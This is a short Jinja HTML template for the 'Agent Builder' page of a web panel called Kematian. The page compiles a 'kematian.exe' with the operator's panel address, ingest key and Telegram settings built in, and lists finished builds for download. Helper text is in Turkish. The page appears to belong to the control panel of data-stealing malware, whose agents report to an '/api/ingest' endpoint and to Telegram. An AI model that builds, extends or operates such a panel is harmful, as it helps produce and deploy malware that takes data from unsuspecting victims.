{% extends "base.html" %} {% block title %}Builder · Kematian{% endblock %} {% block content %}

Agent Builder

Build a fresh kematian.exe on the server with your panel + Telegram config baked in.

{% if error %}
{{ error }}
{% endif %}

Target configuration

Panelinizin adresi. `/api/ingest` otomatik eklenir.

Paneldeki PANEL_INGEST_KEY ile aynı olmalı.

{% if started %}

Build #{{ started }}

{% endif %} {% if builds %}

Recent builds

{% for id, j in builds.items() %} {% endfor %}
#StatusFile
#{{ id }} {{ j['status'] }} {{ j['exe'] and os.path.basename(j['exe']) or '—' }} {% if j['exe'] %}Download{% elif j['status'] == 'running' %}{% endif %}
{% endif %} {% endblock %}